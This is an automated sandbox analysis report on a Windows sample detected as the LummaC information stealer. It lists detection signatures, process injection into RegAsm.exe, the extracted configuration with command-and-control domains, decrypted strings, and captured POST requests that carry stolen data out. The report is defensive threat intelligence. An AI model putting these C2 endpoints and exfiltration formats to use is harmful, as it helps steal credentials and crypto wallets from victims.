Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mkFOY01Gl5.exe

Overview

General Information

Sample name:mkFOY01Gl5.exe
renamed because original name is a hash value
Original sample name:0309dd0131150796ea99b30a62194fae.exe
Analysis ID:1465097
MD5:0309dd0131150796ea99b30a62194fae
SHA1:2df6e334708eae810a74b844fd57e18e9fdc34cd
SHA256:07c09ba5a84f619e5b83a54298ffc58d20b00f14399c7a94b7f02b70efc60f35
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • mkFOY01Gl5.exe (PID: 6056 cmdline: "C:\Users\user\Desktop\mkFOY01Gl5.exe" MD5: 0309DD0131150796EA99B30A62194FAE)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: mkFOY01Gl5.exeAvira: detected
      Antivirus detection for URL or domain
      Source: https://potterryisiw.shop/piRAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/apiA48)Avira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/tAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/piAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/apiAvira URL Cloud: Label: malware
      Source: foodypannyjsud.shopAvira URL Cloud: Label: malware
      Source: pedestriankodwu.xyzAvira URL Cloud: Label: malware
      Source: contintnetksows.shopAvira URL Cloud: Label: malware
      Source: potterryisiw.shopAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/(qAvira URL Cloud: Label: malware
      Source: penetratedpoopp.xyzAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/lliAvira URL Cloud: Label: malware
      Source: swellfrrgwwos.xyzAvira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/Avira URL Cloud: Label: malware
      Source: https://potterryisiw.shop/api44Avira URL Cloud: Label: malware
      Found malware configuration
      Source: 4.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}
      Multi AV Scanner detection for domain / URL
      Source: https://potterryisiw.shop/apiVirustotal: Detection: 13%Perma Link
      Multi AV Scanner detection for submitted file
      Source: mkFOY01Gl5.exeReversingLabs: Detection: 68%
      Source: mkFOY01Gl5.exeVirustotal: Detection: 71%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: mkFOY01Gl5.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pedestriankodwu.xyz
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: towerxxuytwi.xyzd
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ellaboratepwsz.xyzu
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: penetratedpoopp.xyz
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: swellfrrgwwos.xyz
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: contintnetksows.shop
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: foodypannyjsud.shop
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: potterryisiw.shop
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: potterryisiw.shop
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: H8NgCl--default2806
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417592 CryptUnprotectData,4_2_00417592
      Source: mkFOY01Gl5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
      Source: mkFOY01Gl5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010AA16 FindFirstFileExW,0_2_0010AA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_0043B00A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+14h]4_2_004180AA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx4_2_0041B990
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+00000A90h]4_2_0041FAE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al4_2_00428A88
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]4_2_00402D60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000F4h]4_2_00424F10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h4_2_00424F10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+18h]4_2_0040FF30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax4_2_004241DE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h4_2_004241DE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00439270
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00439270
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]4_2_004212D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h4_2_004212D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h4_2_00425350
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx4_2_004083F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx+eax*4], bx4_2_004083F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax4_2_0041343E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push edi4_2_00426483
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp esi4_2_0043C4BB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp esi4_2_0043C5C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]4_2_00416637
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_0043B776
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp esi4_2_0043C7C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp esi4_2_0043C8C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h4_2_00413940
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]4_2_00423976
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_00423976
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]4_2_0040EA70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00426A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00425A2A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx4_2_00416AD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3BEBD150h4_2_00436AD2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+ebx], 0000h4_2_0041BB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00433BF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00449828h]4_2_0043AC04
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00438C80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00413D71
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, edi4_2_00422E75
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx4_2_00421EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al4_2_00428F65

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: pedestriankodwu.xyz
      Source: Malware configuration extractorURLs: towerxxuytwi.xyzd
      Source: Malware configuration extractorURLs: ellaboratepwsz.xyzu
      Source: Malware configuration extractorURLs: penetratedpoopp.xyz
      Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
      Source: Malware configuration extractorURLs: contintnetksows.shop
      Source: Malware configuration extractorURLs: foodypannyjsud.shop
      Source: Malware configuration extractorURLs: potterryisiw.shop
      Source: Malware configuration extractorURLs: potterryisiw.shop
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20573Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3806Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1299Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 546185Host: potterryisiw.shop
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: potterryisiw.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: potterryisiw.shop
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
      Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/(q
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/api
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/api44
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/apiA48)
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/lli
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/pi
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/piR
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://potterryisiw.shop/t
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430CF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00430CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430CF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00430CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430F10 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,4_2_00430F10
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_001149200_2_00114920
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_001048690_2_00104869
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010E8C80_2_0010E8C8
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_001052890_2_00105289
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000FDAB40_2_000FDAB4
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00100B000_2_00100B00
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F3D500_2_000F3D50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004175924_2_00417592
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004227B04_2_004227B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417AC54_2_00417AC5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404E704_2_00404E70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00421F5A4_2_00421F5A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00402FA04_2_00402FA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004090604_2_00409060
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004361204_2_00436120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004241DE4_2_004241DE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E1E04_2_0043E1E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004211E64_2_004211E6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004392704_2_00439270
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041E2CE4_2_0041E2CE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004083F04_2_004083F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043C4BB4_2_0043C4BB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004225694_2_00422569
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E5104_2_0043E510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043C5C04_2_0043C5C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004035E04_2_004035E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042166A4_2_0042166A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004067704_2_00406770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043C7C04_2_0043C7C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043C8C04_2_0043C8C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004188EE4_2_004188EE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004239764_2_00423976
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004039904_2_00403990
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043CA004_2_0043CA00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00426CC04_2_00426CC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401CDA4_2_00401CDA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401CA44_2_00401CA4
